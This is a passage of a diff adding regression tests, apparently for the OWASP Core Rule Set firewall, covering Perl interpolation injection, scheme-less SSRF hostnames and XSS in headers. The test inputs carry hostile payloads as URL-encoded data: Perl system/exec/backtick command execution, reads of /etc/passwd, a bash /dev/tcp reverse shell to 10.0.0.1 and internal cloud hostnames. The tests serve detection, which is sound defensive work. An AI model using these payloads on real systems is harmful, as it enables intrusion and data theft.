text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0xA9.0xFE.0xA9" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index 55a28d3bd0..b4d2936751 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -4,7 +4,7 @@ meta: rule_id: 934140 tests: - test_id: 1 - desc: Perl interpolation attack + desc: "Perl interpolation attack: @{[system 'whoami']}" stages: - input: dest_addr: 127.0.0.1 @@ -14,8 +14,796 @@ tests: User-Agent: "OWASP CRS test agent" method: GET port: 80 - uri: "/get?x=@{[system+whoami]}" + uri: "/get?x=%40%7B%5Bsystem%20%27whoami%27%5D%7D" version: HTTP/1.1 output: log: expect_ids: [934140] + - test_id: 2 + desc: "Perl interpolation attack: @{[getpwuid($>)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bgetpwuid%28%24%3E%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 3 + desc: "Perl interpolation attack: @{[rand 100]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Brand%20100%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 4 + desc: "Perl interpolation attack: @{[$$]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%24%24%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 5 + desc: "Perl interpolation attack: @{[keys %ENV]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bkeys%20%25ENV%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 6 + desc: "Perl interpolation attack: @{[crypt($passwd, 'xx')]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bcrypt%28%24passwd%2C%20%27xx%27%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 7 + desc: "Perl interpolation attack: @{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 8 + desc: "Perl interpolation attack: @{[uc 'hello']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Buc%20%27hello%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 9 + desc: "Perl interpolation attack: @{[sort { $a <=> $b } (3,2,1)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsort%20%7B%20%24a%20%3C%3D%3E%20%24b%20%7D%20%283%2C2%2C1%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 10 + desc: "Perl interpolation attack: @{ [ uc 'hello' ] }" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%20%20%20%5B%20%20%20uc%20%20%20%27hello%27%20%20%20%5D%20%20%20%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 11 + desc: "Perl interpolation (parens before call): @{[ (system 'id') ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%28system%20%27id%27%29%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 12 + desc: "Perl interpolation (ampersand call): @{[ &system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%26system%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 13 + desc: "Perl interpolation (double negation unary): @{[ !!system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%21%21system%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 14 + desc: "Perl interpolation (CORE namespace): @{[ CORE::system 'id' ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20CORE%3A%3Asystem%20%27id%27%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 15 + desc: "Perl interpolation (do{} block): @{[ do { system 'id' } ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20do%20%7B%20system%20%27id%27%20%7D%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 16 + desc: "Perl interpolation (qq{} string arg): @{[ system qq{whoami} ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20system%20qq%7Bwhoami%7D%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 17 + desc: "Perl interpolation (string concatenation arg): @{[ system ('who'.'ami') ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20system%20%28%27who%27.%27ami%27%29%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 18 + desc: "Perl interpolation (whitespace & tabs): @{[\tsystem\t'id'\t]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%09system%09%27id%27%09%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 19 + desc: "Perl interpolation (newline before ]): @{[ system 'id' # cmt \\n ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%20%23cmt%0A%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 20 + desc: "Perl interpolation (ampersand + namespace, no args): @{[ &CORE::time ]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%20%26CORE%3A%3Atime%20%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 21 + desc: "Perl interpolation (extra spaces everywhere): @{ [ system \"id\" ] }" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%20%20%20%20%5B%20%20%20%20system%20%20%20%20%22id%22%20%20%20%20%5D%20%20%20%20%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 22 + desc: "Perl interpolation attack (double @ valid): @@{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 23 + desc: "Perl interpolation attack (quad @ attempt; likely error but malicious intent): @@@@{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%40%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 24 + desc: "Perl interpolation (evasion: missing closing brace): @{[system 'id']" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 25 + desc: "Perl interpolation (evasion: missing closing brace with extra text): @{[system 'id']extra" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27id%27%5Dextra" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 26 + desc: "Perl interpolation (evasion: multiple bracket pairs): @{[test][test2]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Btest%5D%5Btest2%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 27 + desc: "Perl interpolation (backslash in command): @{[system 'who\\ami']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27who%5Cami%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 28 + desc: "Perl interpolation (empty quotes in command): @{[system 'whoam''''i']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27whoam%27%27%27%27i%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 29 + desc: "Perl interpolation in POST body: @{[system 'id']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: POST + port: 80 + uri: "/post" + data: "param=%40%7B%5Bsystem%20%27id%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 30 + desc: "Perl interpolation in cookie value: @{[CORE::time()]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "session=@{[CORE::time()]}" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 31 + desc: "Perl interpolation in cookie name: @{[system 'id']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "@{[system 'id']}=value" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 32 + desc: "Perl interpolation in argument name: @{[getpwuid($>)]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%40%7B%5Bgetpwuid%28%24%3E%29%5D%7D=value" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 33 + desc: "Perl interpolation (vertical tab whitespace): @{[\\vsystem\\v'id'\\v]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%0Bsystem%0B%27id%27%0B%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 34 + desc: "Perl interpolation (exec instead of system): @{[exec 'whoami']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bexec%20%27whoami%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 35 + desc: "Perl interpolation (backticks): @{[`whoami`]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5B%60whoami%60%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 36 + desc: "Perl interpolation (qx{} command): @{[qx{whoami}]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bqx%7Bwhoami%7D%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 37 + desc: "Perl interpolation (eval block): @{[eval{system 'id'}]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Beval%7Bsystem%20%27id%27%7D%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 38 + desc: "Perl interpolation (open pipe): @{[open F,'|ls']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bopen%20F%2C%27%7Cls%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 39 + desc: "Perl interpolation (require statement): @{[require File::Find]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Brequire%20File%3A%3AFind%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 40 + desc: "Perl interpolation (long payload): @{[system 'cat /etc/passwd | grep root | cut -d: -f1']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27cat%20%2Fetc%2Fpasswd%20%7C%20grep%20root%20%7C%20cut%20-d%3A%20-f1%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 41 + desc: "Perl interpolation (reverse shell): @{[system 'bash -c bash -i >& /dev/tcp/10.0.0.1/4242 0>&1']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bsystem%20%27bash%20-c%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.0.1%2F4242%200%3E%261%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 42 + desc: "Perl interpolation (file read): @{[open F,'/etc/passwd';@a=]}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5Bopen%20F%2C%27%2Fetc%2Fpasswd%27%3B%40a%3D%3CF%3E%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 43 + desc: "Perl interpolation (mixed case @): @{[System 'ID']}" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%40%7B%5BSystem%20%27ID%27%5D%7D" + version: HTTP/1.1 + output: + log: + expect_ids: [934140] + - test_id: 44 + desc: "Negative test: JSON array (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=%7B%22array%22%3A%5B1%2C2%2C3%5D%7D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 45 + desc: "Negative test: CSS attribute selector (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?css=div%5Bdata-value%3D%22test%22%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 46 + desc: "Negative test: Email address with @ (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?email=user%40example.com" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 47 + desc: "Negative test: Python dict syntax (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?data=%7B%27key%27%3A%5B%27value1%27%2C%27value2%27%5D%7D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 48 + desc: "Negative test: JavaScript array (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arr=%5B%22a%22%2C%22b%22%2C%22c%22%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 49 + desc: "Negative test: Markdown link syntax (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=%5Blink%5D%28https%3A%2F%2Fexample.com%29" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] + - test_id: 50 + desc: "Negative test: Hash with array value (should not match)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?perl=%24hash%7Bkey%7D%3D%5B1%2C2%2C3%5D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [934140] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml new file mode 100644 index 0000000000..056c461973 --- /dev/null +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934190.yaml @@ -0,0 +1,329 @@ +--- +meta: + author: "fzipitria" + description: "Test for SSRF scheme-less hostname detection in PL1" +rule_id: 934190 +tests: + - test_id: 1 + desc: SSRF - scheme-less localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 2 + desc: SSRF - scheme-less localhost.localdomain + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost.localdomain/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 3 + desc: SSRF - scheme-less localhost4 + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost4/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 4 + desc: SSRF - scheme-less localhost4.localdomain4 + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localhost4.localdomain4/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 5 + desc: SSRF - scheme-less ipv6-localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=ipv6-localhost/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 6 + desc: SSRF - scheme-less ip6-loopback + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=ip6-loopback/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 7 + desc: SSRF - scheme-less host.docker.internal (Docker) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=host.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 8 + desc: SSRF - scheme-less gateway.docker.internal (Docker) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=gateway.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 9 + desc: SSRF - scheme-less kubernetes.docker.internal (Docker Desktop) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=kubernetes.docker.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 10 + desc: SSRF - scheme-less host.containers.internal (Podman) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=host.containers.internal/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 11 + desc: SSRF - scheme-less kubernetes.default.svc.cluster.local (K8s) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=kubernetes.default.svc.cluster.local/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 12 + desc: SSRF - scheme-less LOCALHOST (Windows case) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=LOCALHOST/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 13 + desc: SSRF - scheme-less localtest.me (testing service) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=localtest.me/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 14 + desc: SSRF - scheme-less lvh.me (testing service) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=lvh.me/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 15 + desc: SSRF - scheme-less localhost in POST body + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post/test" + data: "url=localhost%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 16 + desc: SSRF - scheme-less host.docker.internal in cookie + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "redirect=host.docker.internal/" + method: GET + uri: "/get/test" + version: "HTTP/1.1" + output: + log: + expect_ids: [934190] + - test_id: 17 + desc: SSRF - localhost with scheme (overlaps with 934110) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=http%3A%2F%2Flocalhost%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110, 934190] + - test_id: 18 + desc: SSRF - negative test - legitimate domain + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?url=example.com/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] + - test_id: 19 + desc: SSRF - negative test - word containing localhost + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?server=mylocalhost" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] + - test_id: 20 + desc: SSRF - negative test - localhost without trailing slash + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get/test?server=localhost" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934190] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml index 0fa0750f82..392115998e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml @@ -1,6 +1,6 @@ --- meta: - author: "csanders-git, azurit" + author: "csanders-git, azurit, touchweb_vincent" rule_id: 941110 tests: - test_id: 1 @@ -173,3 +173,37 @@ tests: output: log: no_expect_ids: [941110] + - test_id: 11 + desc: XSS in Custom HTTP header + stages: + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Remote-ip: "" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 12 + desc: XSS in Custom HTTP header + stages: + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: 